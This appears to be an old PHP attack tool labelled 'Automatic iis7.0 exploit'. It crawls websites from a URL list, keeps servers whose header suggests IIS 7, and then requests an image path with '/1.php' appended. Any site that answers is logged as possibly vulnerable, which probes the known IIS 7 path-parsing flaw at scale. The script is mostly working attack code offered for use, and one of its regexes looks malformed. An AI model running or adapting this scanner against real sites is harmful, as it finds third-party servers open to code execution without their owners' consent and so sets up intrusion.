|
exploit.php:
<?php
print("
[-] Exploit Title: Automatic iis7.0 exploit [-]
[+] Date: 4/9/2011 [+]
[-] Team: DMTeam [-]
[+] Author: Dark'moon [+]
[-] QQ:40497992 [-]
[-] Email: 40497992@qq.com [-]
[+] Software Link: http://www.moonhack.com/ [+]
[+]Start-----------------------------[+]
[-]Explain:完成后自动关闭 打开ok.txt查看结果[-]\r\n");
error_reporting(E_ERROR);
set_time_limit(0);
f();
//获取url函数
function pregUrl($ip){
$url = @file_get_contents($ip);
//$url_list = file('data.txt');
$preg='/[a-zA-z]+:\/\/www?\.[0-9a-zA-z_]+[\.a-z]+/';
if(preg_match_all($preg,$url,$match_all)){
foreach ($match_all as $value){
$value=array_values(array_unique($value));
foreach ($value as $key=>$ok){
$ok=trim($ok);
print("获取网站{$ok}\r\n");
write($ok);
}
// pregUrl($ok);
}
}
}
//写入函数
function write($data){
$fileName='t00ls.txt';
$handle = @fopen($fileName,"a");
@fwrite($handle,$data."\r\n");
@fclose($handle);
}
//开始函数
function f(){
$file = file('list_url.txt');
foreach ($file as $value){
$value = trim($value);
pregUrl($value);
}
}
//去掉重复
print("获取网站完毕\r\n");
unique();
function unique(){
$list_url = file('t00ls.txt');
$filename = 'list_url.txt';
$handle = fopen($filename, 'w');
$list_url = array_unique($list_url);
foreach($list_url as $data){
print("正在写入网站 ".$data);
fwrite($handle,$data);
}
}
a();
//获取服务器类型
function Server($url){
$array = get_headers($url,1);
if(array_key_exists('Server',$array)){
if(!is_array($array['Server'])){
$preg = "/7/";
$ma = "网址: ".$url." 服务器类型: ".$array['Server']."\r\n";
echo $ma;
if(preg_match($preg,$ma)){
w($url);//调用写入函数
}
}
}
}
//读入函数
function a(){
$url_list =file('list_url.txt');
//print_r($url_list);
foreach ($url_list as $url){
Server(trim($url));
}
}
//写入函数
function w($url){
$fileName = 'url.txt';
$handle = fopen($fileName,'a');
fwrite($handle,$url."\r\n");
}
urltxt();
//读入url.txt
function urltxt(){
$list_url = file('url.txt');
foreach($list_url as $url){
$url = trim($url);
img($url);
}
}
//获取网页响应码
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_exec($ch);
$p=curl_getinfo($ch);
curl_close($ch);
if(trim($p['http_code'])=='200'){
print("$url 可能存在漏洞\r\n");
urlwrite($url);
}else{
print("$url 不存在漏洞\r\n");
}
}
//获取网站图片
function img($url){
$htm = file_get_contents($url);
$p='/[0-a-ZA-Z_\/]*\.(gif|jpg|bmp|png|swf|txt)/i';
if(preg_match($p,$htm,$match)){
$url = $url.'/'.$match[0].'/1.php';
curl($url);
}
}
function urlwrite($url){
$ok_filename = 'ok.txt';
$handle = fopen($ok_filename,"a");
fwrite($handle,$url."\r\n");
}
?> |